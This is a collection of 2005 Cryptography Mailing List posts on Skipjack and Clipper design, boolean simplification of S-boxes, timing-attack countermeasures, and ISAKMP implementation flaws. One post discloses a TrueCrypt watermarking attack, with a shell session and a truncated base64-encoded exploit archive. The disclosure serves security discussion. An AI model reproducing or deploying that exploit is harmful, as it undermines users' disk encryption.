Re: the effects of a spy
actually justified for cryptosystems: It turned out, on the key escrow side of the protocol design, NSA actually fell over the edge, and there was a simple attack (Matt Blaze's work, as I recall). Details on the so-called LEAF blower here: http://www.crypto.com/papers/eesproto.pdf -- http://www.lightconsulting.com/~travis/ -- We already have enough fast, insecure systems. -- Schneier Ferguson GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
solving, simplification and factorization of boolean equations
Does anyone have any references on how one would go about creating manipulating the boolean equations that govern symmetric ciphers? I know that most of the time ciphers describe an algorithm, often using tables (S-boxes and E-tables) in lieu of providing equations, and I'm wondering how one goes about generating the equations for each bit of the output. One thing I've always been curious about is the minimum amount of work (in terms of a primitive boolean gate such as NAND) necessary to compute the output values. Could there be tables derived from equations so cleverly arranged that brute forcing is very simple once you know the original equations, but their exact structure is not evident from the tables themselves? Once you have some equations, how would you go about simplifying them? I suspect that finding the simplest form is probably NP-hard, but I'm not certain and don't quite know where to start reading on the subject. -- http://www.lightconsulting.com/~travis/ -- We already have enough fast, insecure systems. -- Schneier Ferguson GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: timing attack countermeasures (nonrandom but unpredictable delays)
In many cases, the observed time depends both on the input and on some other random noise. In such cases, averaging attacks that use the same input over and over again will continue to work, despite the use of a pseudorandom input-dependent delay. For instance, think of a timing attack on AES, where the time compute the map X |-- AES(K,X) depends only on K and X, but where the measured time depends on the computation time (which might be a deterministic function of K and X) plus the network latency (which is random). Indeed, in this example even the computation time might not be a deterministic function of K and X: it might depend on the state of the cache, which might have some random component. I don't follow; averaging allows one to remove random variables from the overall time, but you're still left with the real computation time plus the the deterministic delay I suggested as a function of the input. Specifically, time t(k,x) = f(k,x) + d(k,x) + r Where r is a random variable modelling all random factors, f is the time to compute the function, and d is the deterministic delay I suggested that is a function of the inputs. Averaging with repeated evaluations of the same k and x allows one to compute the mean value of r, and the sum f+d, but I don't see how that helps one seperate f from d. What am I missing? -- http://www.lightconsulting.com/~travis/ -- We already have enough fast, insecure systems. -- Schneier Ferguson GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: gonzo cryptography; how would you improve existing cryptosystems?
Thomas Sjögren wrote: On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote: The only thing close that I've seen is Bestcrypt, which is commercial and has a Linux and Windows port. I don't recall if the Linux port came with source or not. http://www.truecrypt.org/ TrueCrypt Free open-source disk encryption software for Windows XP/2000/2003 and Linux Unfortunately truecrypt is just another broken device crypto implementation that uses good ciphers in insecure way. Specially crafted static bit patterns are easily detectable through that kind of bad crypto. Requirements: (1) used ciphers must have 128-bit block size and (2) file system where bit patterns are stored must have 2K or larger soft block size. Many popular linux file systems meet those requirements. Uuencoded exploit source code is included in this email. # truecrypt --device-number 0 --filesystem ext2 /tmp/container1.tc /mnt Enter password for '/tmp/container1.tc': # mount | grep /mnt /dev/mapper/truecrypt0 on /mnt type ext2 (rw) # tune2fs -l /dev/mapper/truecrypt0 | grep Block size Block size: 4096 # ./create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 /mnt/foo1 # truecrypt -d /mnt # truecrypt -l truecrypt: Kernel module not loaded # ./detect-watermark-encodings-truecrypt /tmp/container1.tc 5241344 bytes scanned watermark encoding 10, count 44 watermark encoding 11, count 55 watermark encoding 12, count 66 watermark encoding 666, count 77 # uname -s -r Linux 2.6.14.2 # truecrypt --version | head -n 1 truecrypt 4.0 -- Jari Ruusu 1024R/3A220F51 5B 4B F9 BB D3 3F 52 E9 DB 1D EB E3 24 0E A9 DD begin-base64 644 watermark-exploits.tar.bz2 QlpoOTFBWSZTWeuNme8ADZ3/ssx0AEB7f///P9/fz3/v3/8AAIQACAgAGGAN nnwEqCUQqipEUqokqkVUiFSISEgAcyaaGQAMRkGQA0wQMQDRpoAMgaADmTTQ yABiMgyAGmCBiAaNNABkDQAcyaaGQAMRkGQA0wQMQDRpoAMgaADmTTQyABiM gyAGmCBiAaNNABkDQAIohBMgJpqeU009JT0ntTNSZHpPUHimR6ENBo0AZDZQ RJEEQxJ6aRmo0PVNohPFPKMaaho00BmoyabQm9UaB9YN3zD7uQ0uGhMQQjFw ovPsu59lbbHEbDANRoHMwpN+A4I3ICwoyKyKri/aPWJ4Bpp90apid/skslos GNVThAojZhazYDGo+TCU02cKGmCRgkkhhIEcIDZpshYqiiAyQbQQoLkYEGFi mxYtSSBYNhxh7XxDu+yfEP0PcHkHrVyIxYIUx9j7fscvazIdo7hDtBSySRjG D7wNDzD59/QG8GCAJyDAARzBFeI1ogaVPnIbx+p53mezsvjYwxA+Hzz0fDCo yFvlZ1ig6D7DK4Nw2GjuP6liC80N7cGuDp8eQUIK0pJtgj6w8ZRp0tGdNC4N Q/a8h63vIbESAvqp7ZErnbgb3WdZYxwwNxYud1oNAT+doheQugsy+Y3HDuwi gaci/4HVzdWY22h2sVC4ZmDsdPEWvAub+8QPdaqR3G+U6wGEe6WNMGVcCz3c iJYmUCd6ixloepxzc/GPUDGOsnIPsG+IOBh4ho+0bIQHAaWBEO2cg6zlcveL 6zvc9n3MmhyJ9ubX3xxQ/W9PiGHtk84+jVCTiOhseb8HW74OIHlOceblxcXF 0vB7j4NeD/oqOTUYa8QhsBwOIZut1LrwZvHJopcOLIy+8a3Y1fG3OkNFW4vI LODDLWzUYL+ODihccmBnkH4Z6DENZx2oI8Tk/2ODd2j6dQ+FqO1s5Op0Fkik Oy7dCGmW91N7YDDAIdzsJxGL9I9I4aWzjDYZludzlpNV5Zh8634lWo4uZk++ /GCaAo0a9kRJQnuloUkg4gaGBCBADU21q/NGOp1D1NIWbsQ+ABp+UffaE1Rw kkIPOJsHT1E+7DCQhjuCwR5hjELWvUJKhHBqluOOMklsZMGgqzQ4MUvyDdsh 4G7YljSJCwZaCy2tv0luwaGhMh8x2/RZ7hkjyhjR+M75gUCDEvDrfQ9vowc2 zi8WTZs6GwaTS9o5ZCYwhoNJUJCpwaOoiN9aLaKuxhoFS210sm0bYaWTvIB6 hgVCIwcWKFjtPmjIEPINwQ2ieUTc3c7uAsDHPod7gbHtO4ed6A0ED6A9gfQH rDkduVErp0nQQknWONzkfjHU9LZz3oWA23ep2nfe+cApyes9O0Yea+L4pX1d yJK6elgiIIgghkkkCGYxfUMb/WOAXHoHmadiEfeMwggOI/CP2DvHyKH/h+gN zA6EPxOt99+VydY+XsBDcUfAMIUAQ9Z5w1D+0YEPID2yOIhkF7xCgKozRPSQ cSCkJ6SCcQPApAwNtJUhiPXrUIwNTmYFkMT08dCFy3lybv5oASHOQyz2cpk7 GhgYjQlQhFkGoQGRJRo30BsM1DGGKFsSqUY2sVdhCd/XlrGpJXMfn1xkMZN8 ahuJM4kgqGhSS+8sxUZAgrZgJbrrAW/iFgwyq5MQkBCSSNRoxywu58XKtIYm gcOQCG0YdLzBYchkMACgU1rd/3ZqqEstdkScXMh9Tk9JEOMA+QfvN4b3B1Pi BxdvwZ/NR4euNT8JtjnFCDdOJ9xxpswnJmVqvTIMnqg3liebvVRLsRtDRjM/ jnAuc3wBiFlgv0fAXwEbJbho1ISxTucw3qp65xxB9gFeEi2Rs1UbU1CwQK+h 5tHtAYe5IF74B0B4w+FSoPyB6QuCg/SEBe+MN7u+0bL6A8n1jwQuB2GwG42f iIg/cMH9QRXzdxhEOTw0WYtxlr3GyEHQ+t2nhyPKZ+Thg1Ju8VzAzvkUBlf8 mXWOjPBJOs4D8QfVelXax/kZd9fU82HpU++rV7w+saoQ0dJkfhf9hOT8j4HI gZeLobl0IfpcHzDLpqNkDlQxD43xtD7vrH8rH7wfUOpEP8DHxkfxNml1EmpM AyDYLl/kIoG/LNt9Q9/aEL8vw1pmm9b9qVB0kNwhj1vomtIGZmlYmszQmZlZ DQuGBJQPyg+gHqG2l6QjAofnYAedq8wHYQgpU2QPsGHWwMjoH6TlWT2zJ/yt 2vTKJISEOJsXIlgWzGczTHuvBshBgNyN2mh2JYsPY6BjSuD3XFshpA7AHeJQ cHVpun2zPum6Gjcl4AkDRDIGRlOp6goObxfLuk6nMrvAau5fI3uI+x3tV+Nh vMZA/Rg5BQcWQJS/LBmwsV7Xrq2cgzNTlJJFu2KcANAwu6QTCA+M+k0LijoC 0lwEODKFBohoGj/QajXWZKSNhiYj/R50PGwgQkRj4mjuQfzjBO+iRwelDScE 6do7HXxZHABOA2YGoFEDdxZdC7kMgDQe/yjvQ2AZgd4eAQhAZSHTRmyiBcYh GKVEuxShCMVcB7bAPsHzvicuogzZLi8ZZZYGjKSOUuaoEod4GXsVnSqXBg3N wrYHsDWQ7mA8wDtGUCrjrZX8DyA3qfdUWz4BvdI6QfCONDrUwHd/oiQi87Iw NpTRRApu4jtQNz2wfF1KWGw9rozbjvT8QHSNAvUxChiiYOI+eOpoaoMAezEd o7wI5upWI3Q5xg7vgVi6EHYXHgNlNBzK0AZSweloidCtGUNw8vEwGuUPHzZZ YiFJTQPIM0B5nhi4gZA8qF3Q4jxgOa9LO6G9zxQxdQCbmgXlWC9kgC9geRbk 9ZDdiMNczDBxQqEsjtgajLKe0GVKUGQGAqXDIjESIRD5gcAy4IG9zHbczbK4 oRYxEKYKwcxjcPsddSLg4mIJ7UINkYxSNEBs2B43BreBxBBvCFlhlaDc1DN3 7UFMATFDq6AfMpeBmhR5uGY5fcF4NU5MoXg6kNo6qDYTsDNuB0JwWypoUdw4 j6ig+3DpYDpIDe3tOkkeA71KuwDqava62je+t+dR6HeOoe6AaiDVA0UAc7ag nO6HASzHiSw8ENwOWI9wcDJENI8Y0NDwB60HzDEuKmAqVQ+l0v9x6B2jchqI A2Ga6E2KPa2A5Nl7Xm0F6WzOBASwBDGpnosMumGUScRzet/4MDwPCw5DnJyP ChcygUVswHvtzaiEDpWw2ap9oMMuuajUbgdDUNwPQcQSB4CdY2KQvk0Oic2p
Re: ISAKMP flaws?
* Perry E. Metzger: I haven't been following the IPSec mailing lists of late -- can anyone who knows details explain what the issue is? These bugs have been uncovered by a PROTOS-style test suite. Such test suites can only reveal missing checks for boundary conditions, leading to out-of-bounds array accesses and things like that. In other words, trivial implementation errors which can be easily avoided using proper programming tools. - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: ISAKMP flaws?
Florian Weimer [EMAIL PROTECTED] writes: * Perry E. Metzger: I haven't been following the IPSec mailing lists of late -- can anyone who knows details explain what the issue is? These bugs have been uncovered by a PROTOS-style test suite. Such test suites can only reveal missing checks for boundary conditions, leading to out- of-bounds array accesses and things like that. In other words, trivial implementation errors which can be easily avoided using proper programming tools. I feel a need to comment on statements like this... at several times in the past I've seen people make sweeping generalisation like this, Everyone knows about this security weakness, this { paper | article | security alert } isn't { novel | interesting | worth publishing }, or some variant thereof (in this case these trivial errors are easily avoided). What makes these statements rather unconvincing is that the majority of all implementations out there all make these trivial easily-avoided errors (or the majority of users aren't aware that the well-known problem in the security alert exists, or whatever). The nicest example I've seen of this was where the head of a standards working group explained that some obscure feature that implementors had been getting wrong was so obvious that they'd consciously omitted putting it in the standard because everyone just magically knew about it. In this particular case if the problem is so trivial and easily avoided, why does almost every implementation (according to the security advisory) get it wrong? Peter. - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: solving, simplification and factorization of boolean equations
Travis, Have a look at Karnough Maps, which is a matrix Boolean algebra reduction technique. I understand that there are more advanced computational algorithms at this point. But, I believe that they build off of the principle of adjacency found in a Karnough Map matrix. Best regards, -- Mike - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: timing attack countermeasures (nonrandom but unpredictable de lays)
| In many cases, the observed time depends both on the input and on some | other random noise. In such cases, averaging attacks that use the same | input over and over again will continue to work, despite the use of | a pseudorandom input-dependent delay. For instance, think of a timing | attack on AES, where the time compute the map X |-- AES(K,X) depends only | on K and X, but where the measured time depends on the computation time | (which might be a deterministic function of K and X) plus the network | latency (which is random). Indeed, in this example even the computation | time might not be a deterministic function of K and X: it might depend | on the state of the cache, which might have some random component. | | I don't follow; averaging allows one to remove random variables from | the overall time, but you're still left with the real computation time | plus the the deterministic delay I suggested as a function of the | input. | | Specifically, time t(k,x) = f(k,x) + d(k,x) + r | | Where r is a random variable modelling all random factors, f is the | time to compute the function, and d is the deterministic delay I | suggested that is a function of the inputs. Averaging with repeated | evaluations of the same k and x allows one to compute the mean value | of r, and the sum f+d, but I don't see how that helps one seperate f | from d. What am I missing? Why do you need to separate f from f+d? The attack is based on a timing variation that is a function of k and x, that's all. Think of it this way: Your implementation with the new d(k,x) added in is indistinguishable, in externally visible behavior, from a *different* implementation f'(k,x) which has the undesired property: That the time is a function of the inputs. Any attack that works against such an implementation works against yours. Now, your model is actually general enough to allow for effective d(k,x)'s. For example, suppose that d(k,x) = C - f(k,x), for some constant C. Then t(k,x) is just C - i.e., the computation is constant-time. One can generalize this a bit: f(k,x) in any real application isn't going to have a unique value for every possible (k,x) pair (or even for every possible x for fixed k, or k for fixed x). Even if this were true in a theoretical sense, you couldn't possibly measure it finely enough. The real attack arises because of a combination of things: f(k,x) is actually a function or k and x (or can be made so by averaging); the size of f's range is significant fraction of the size of the domain of k, x, or (k,x), depending on what you are attacking; and, finally, that the inverses images of the elements of f's range are fairly even in size. These all arise because the nature of the attack is to use f(k,x) to determine that k (or x or (k,x)) is actually a member of some subset of the range of k (or ...), namely, the inverse image of the observed value under f. (The need for the last one can be seen by considering a function that sends f(0,x) to x and every other pair of values to 1. Then it's easy to attack the 0 key by computing the timing, but no information about any other key can be gained by timing attacks.) If we think of your d() function as a compensation function, then d(k,x) = C - f(k,x) is an ideal compensation function, which it may be impractical to use. (The ideal compensation function is always available *in principle* because we can set C = max over k,x f(k,x), compute naturally, then compute d(k,x) by looking at the time elapsed for the function we just finished and delay for C less that value.) However, the analysis above shows that there may be other useful compensation functions which, while they can't by their nature provide the degree of security of the ideal compensation function, may still be effective. For example, suppose I have several different ways to compute the function to be protected, with differing timing characteristics; but it's certain that for no input values to all the calculations take the maximum amount of time. If I run all the algorithms in parallel and deliver the first result that is available, I've reduced the range of f by eliminating some of the largest values. (Of course, one has to get the details right!) -- Jerry - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: timing attack countermeasures (nonrandom but unpredictable delays)
From: Travis H. [EMAIL PROTECTED] Sent: Nov 16, 2005 11:37 PM To: David Wagner [EMAIL PROTECTED] Cc: cryptography@metzdowd.com Subject: Re: timing attack countermeasures (nonrandom but unpredictable delays) ... I don't follow; averaging allows one to remove random variables from the overall time, but you're still left with the real computation time plus the the deterministic delay I suggested as a function of the input. Specifically, time t(k,x) = f(k,x) + d(k,x) + r Where r is a random variable modelling all random factors, f is the time to compute the function, and d is the deterministic delay I suggested that is a function of the inputs. Averaging with repeated evaluations of the same k and x allows one to compute the mean value of r, and the sum f+d, but I don't see how that helps one seperate f from d. What am I missing? Let's assume d(k,x) is a random function of k||x, uniformly distributed between 0 and T where T is the average time of the encryption. I choose a set of inputs to the cipher x[0,1,2,...,n-1] so that if my guess of some part of k is right, I expect their total timing to be much lower than the average case. I get back Sum(f(k,x[i])+d(k,x[i])+r[i]). Suppose my guess is wrong. Now what we expect is: a. Sum(f(k,x[i]) = average value b. Sum(d(k,x[i]) = average value c. Sum(r[i]) = average value Suppose my guess is right. Now what we expect is: a. Sum(f(k,x[i]) = unusually low value b. Sum(d(k,x[i]) = average value c. Sum(r[i]) = average value So, right guesses still give me unusually low values, and wrong guesses still give me average-looking values. That means the timing channel is still there--d(k,x) only adds random noise. The only way to avoid this is to make d(k,x) somehow related to f(k,x). That's the idea behind things like having software or hardware go through both the 0 and 1 case for each bit processed in an exponent. In that case, we get d(k,x) being fast when f(k,x) is slow, and vice versa, and we close the timing channel. As long as d(k,x) is independent of f(k,x), I can still test guesses of parts of k or parts of x. --John Kelsey - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: solving, simplification and factorization...
The answer you are looking for is Karnaugh logic maps. This will produce an unoptimized set of gate logic that represents say S-boxes or E-tables. From there you can find smaller gate logic compliments that produce the same logic map. Christopher Abad and I researched this heavily a few years ago regarding DES S-Boxes. He has provided his gatelogic reduction code on his site, http://www.the-mathclub.net. I can send you my generic gate logic optimizer if you'd like. I have one for standard (,|,^,~), mmx/sse2 (,|,^,~,~), and vhdl/verilog (,|,^,~,~,~|,~^). Anyhow, best of luck. -Patrick Stach - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: ISAKMP flaws?
At 11:20 AM +0100 11/17/05, Florian Weimer wrote: These bugs have been uncovered by a PROTOS-style test suite. Such test suites can only reveal missing checks for boundary conditions, leading to out-of-bounds array accesses and things like that. In other words, trivial implementation errors which can be easily avoided using proper programming tools. Which proper programming tools would check for a logic path failure when a crafted packet includes Subpacket A that is only supposed to be there when Subpacket B is there, but the packet doesn't include Subpacket B? There are no programming tools that check for this, or for related issues: it has to be the implementer who has enough understanding of the protocol and enough time (and program space) to code against such issues. Throw in PKIX certificates in certificate chains, and it gets much worse. IKE is a very complicated protocol with many within-packet and within-stream dependencies. These cannot be resolved by proper programming tools unless those tools are specifically crafted for IKE. SSL/TLS probably suffers the same fate. --Paul Hoffman, Director --VPN Consortium - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: the effects of a spy
From: [EMAIL PROTECTED] Sent: Nov 16, 2005 12:26 PM Subject: Re: the effects of a spy ... Remember Clipper? It had an NSA-designed 80-bit encryption algorithm. One interesting fact about it was that it appeared to be very aggressively designed. Most published algorithms will, for example, use (say) 5 rounds beyond the point where differential cryptoanalysis stops giving you an advantage. Clipper, on the other hand, falls to differential cryptoanalysis if you use even one less round than the specification calls for. Nipick: The system was Clipper, the algorithm was Skipjack. Why the NSA would design something so close to the edge has always been a bit of a mystery (well, to me anyway). One interpretation is that NSA simply has a deeper understanding than outsiders of where the limits really are. What to us looks like aggressive design, to them is reasonable and even conservative. Three comments here: a. Maybe they really do have a good generic differential-probability limiting algorithm. There are algorithms like this in the public world (they can be really computationally expensive, and they only tell you upper bounds on a subset of possible attacks), and you'd expect NSA to be interested, since they design a lot of algorithms. It's not so intuitive to me that this would have applied to impossible differentials unless they designed it to, though. In that case, you're looking at differentials that can't appear instead of differentials that appear too often. b. Maybe they don't care that much about attacks that require some huge number of plaintexts. The academic world has defined the game in terms of total work being the critical parameter in the attack, and we're seeing a push over time to move that to total attack cost. (That is, it's not so interesting if you have a 2^{100} attack on a 128-bit block cipher, if the attack is impossible to parallelize.) If someone publishes an attack on Twofish tomorrow which requires 2^{96} plaintexts to break it faster than brute-force, we'll all agree that's an attack. But there's no reason NSA has to think that way--maybe they have some other parameter like 2^{n/2} texts for n-bit block ciphers, after which they don't care about attacks because they're not practical. c. Maybe they just got it wrong. SHA0 and SHA1 demonstrate that this is all too possible. (It's quite plausible to me that they have very good tools for analyzing block ciphers, but that they aren't or weren't sure how to best apply them to hash functions.) ... Or maybe ... the reasoning Perry mentions above applies here. Any time you field a system, there is a possibility that your opponents will get hold of it. In the case of Clipper, where the algorithm was intended to be published, there's no possibility about it. So why make it any stronger than you have to? Reducing Skipjack to 31 rounds wouldn't make a practical trapdoor appear! You're still talking about 2^{34} chosen plaintexts! -- Jerry --John Kelsey - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]
Re: ISAKMP flaws?
Paul Hoffman wrote: At 2:29 PM -0500 11/15/05, Steven M. Bellovin wrote: I mostly agree with you, with one caveat: the complexity of a spec can lead to buggier implementations. Well, then we fully agree with each other. Look at the message formats used in the protocols they have attacked successfully so far. Humorously, security folks seem to have ignored this when designing our protocols. Later, Peter Gutmann wrote: In this particular case if the problem is so trivial and easily avoided, why does almost every implementation (according to the security advisory) get it wrong? Quoting draft-simpson-danger-isakmp-01.txt, published (after being blocked by the IETF for years) as: http://www.usenix.org/publications/login/1999-12/features/harmful.html A great many of the problematic specifications are due to the ISAKMP framework. This is not surprising, as the early drafts used ASN.1, and were fairly clearly ISO inspired. The observations of another ISO implementor (and security analyst) appear applicable: The specification was so general, and left so many choices, that it was necessary to hold implementor workshops to agree on what subsets to build and what choices to make. The specification wasn't a specification of a protocol. Instead, it was a framework in which a protocol could be designed and implemented. [Folklore-00] [Folklore-00] Perlman, R., Folklore of Protocol Design, draft-iab-perlman-folklore-00.txt, Work In Progress, January 1998. Quoting Photuris: Design Criteria, LNCS, Springer-Verlag, 1999: The hallmark of successful Internet protocols is that they are relatively simple. This aids in analysis of the protocol design, improves implementation interoperability, and reduces operational considerations. Compare with Photuris [RFC-2522], where undergraduate (Keromytis) and graduate (Spatscheck, Provos) students independently were able to complete interoperable implementations (in their spare time) in a month or so So, no, some security folks didn't ignore this ;-) -- William Allen Simpson Key fingerprint = 17 40 5E 67 15 6F 31 26 DD 0D B9 9B 6A 15 2C 32 - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]